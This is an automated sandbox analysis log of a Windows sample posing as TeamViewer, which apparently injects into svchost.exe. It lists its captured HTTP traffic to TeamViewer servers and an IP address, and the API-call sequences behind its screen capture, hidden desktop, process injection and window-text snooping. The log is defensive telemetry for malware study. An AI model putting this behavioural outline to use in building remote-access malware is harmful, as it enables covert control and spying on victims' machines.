Source: global trafficHTTP traffic detected: GET /dout.aspx?s=32172978&p=10000001&client=DynGate&data=FyQS+gChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyWysrgwtjS7Mp6YkyYwtzO6sLOynrUwkyY0sbK3ObKqPLgynpgTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpwTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=32172978&client=DynGate&p=10000002 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master1.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: 37.252.232.109 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=12852408&m=fast&client=DynGate&p=10000002 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: 37.252.232.109 Connection: Keep-Alive Cache-Control: no-cache
Source: unknown | HTTPS traffic detected: 172.67.205.33:443 -> 192.168.2.6:49758 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3366E0 GetDesktopWindow,GetDC,CreateCompatibleDC,RtlZeroMemory,GetWindowRect,CreateCompatibleBitmap,SelectObject,BitBlt,RtlZeroMemory,GetCursorInfo,RtlZeroMemory,GetIconInfo,RtlZeroMemory,GetObjectA,DrawIconEx,SHCreateMemStream,RtlZeroMemory,VirtualAlloc,RtlZeroMemory,VirtualFree,DeleteObject,DeleteDC,ReleaseDC,2_2_6F3366E0
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,SendMessageA,GlobalUnWire,SetClipboardData,CloseClipboard,1_2_00405042
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33A130 CharLowerA,CreateEventA,GetLastError,CloseHandle,GetCurrentThreadId,GetThreadDesktop,CloseHandle,CreateDesktopA,CreateThread,WaitForSingleObject,CloseHandle,Sleep,CloseDesktop,CloseHandle,2_2_6F33A130
Source: 77Etc0bR2v.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_0040323C EntryPoint,7414E7F0,SetErrorMode,OleInitialize,SHGetFileInfo,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcat,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcat,lstrcmpi,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,1_2_0040323C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,2_2_6F335B40
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,3_2_6F335B40
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,6_2_6F335B40
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: String function: 0040F6FE appears 64 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: String function: 0053BCB5 appears 478 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: String function: 0053E5C8 appears 37 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: String function: 0040DFA6 appears 37 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: String function: 004A1B0C appears 248 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: String function: 0053BCE8 appears 68 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F333610 GetProcessHeap,CreateEnvironmentBlock,RtlZeroMemory,RtlZeroMemory,CreateProcessAsUserW,CreateProcessAsUserW,Sleep,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DestroyEnvironmentBlock,CloseHandle,2_2_6F333610
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00401000 NtdllDefWindowProc_A,BeginPaint,GetClientRect,DeleteObject,CreateBrushIndirect,FillRect,DeleteObject,CreateFontIndirectA,SetBkMode,SetTextColor,SelectObject,SelectObject,DrawTextA,SelectObject,DeleteObject,EndPaint,1_2_00401000
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F338510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,LoadLibraryA,FindWindowW,FindWindowW,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,wsprintfA,LoadLibraryA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,2_2_6F338510
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33B1F0 NtSuspendThread,NtClose,2_2_6F33B1F0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33ADE0 NtProtectVirtualMemory,2_2_6F33ADE0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33AFC0 NtGetContextThread,NtSetContextThread,2_2_6F33AFC0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F338400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache,2_2_6F338400
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33B270 NtResumeThread,NtClose,HeapFree,2_2_6F33B270
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33B0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,2_2_6F33B0A0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33AD39 NtProtectVirtualMemory,2_2_6F33AD39
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33A500 NtQueryVirtualMemory,2_2_6F33A500
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F332750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,2_2_6F332750
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F336D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,2_2_6F336D50
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3323B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,2_2_6F3323B0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F337790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW,2_2_6F337790
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3319F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,2_2_6F3319F0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33AE20 NtOpenThread,2_2_6F33AE20
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F331C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,2_2_6F331C00
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F332640 #404,RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,#404,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,2_2_6F332640
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F334EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,2_2_6F334EF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3314E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,2_2_6F3314E0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33B2D0 RtlMoveMemory,NtFlushInstructionCache,2_2_6F33B2D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F332ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,2_2_6F332ED0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3318D0 NtProtectVirtualMemory,2_2_6F3318D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33AFC0 NtGetContextThread,NtSetContextThread,3_2_6F33AFC0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F336D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,3_2_6F336D50
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33ADE0 NtProtectVirtualMemory,3_2_6F33ADE0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F337790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW,3_2_6F337790
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F338510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,LoadLibraryA,FindWindowW,FindWindowW,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,wsprintfA,LoadLibraryA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,3_2_6F338510
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F338400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache,3_2_6F338400
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33B270 NtResumeThread,NtClose,HeapFree,3_2_6F33B270
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33B1F0 NtSuspendThread,NtClose,3_2_6F33B1F0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33B0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,3_2_6F33B0A0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33AE20 NtOpenThread,3_2_6F33AE20
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F334EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,wsprintfA,CloseHandle,CloseHandle,CloseHandle,3_2_6F334EF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F332ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,3_2_6F332ED0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33AD39 NtProtectVirtualMemory,3_2_6F33AD39
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F331C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,3_2_6F331C00
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F3319F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,3_2_6F3319F0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F3318D0 NtProtectVirtualMemory,3_2_6F3318D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F332750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,3_2_6F332750
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F332640 #404,RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,#404,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,3_2_6F332640
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33A500 NtQueryVirtualMemory,3_2_6F33A500
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F3314E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,3_2_6F3314E0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F3323B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,3_2_6F3323B0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33B2D0 RtlMoveMemory,NtFlushInstructionCache,3_2_6F33B2D0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F338510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,wsprintfA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,6_2_6F338510
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33AD39 NtProtectVirtualMemory,6_2_6F33AD39
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33A500 NtQueryVirtualMemory,6_2_6F33A500
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F332750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,6_2_6F332750
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F336D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,6_2_6F336D50
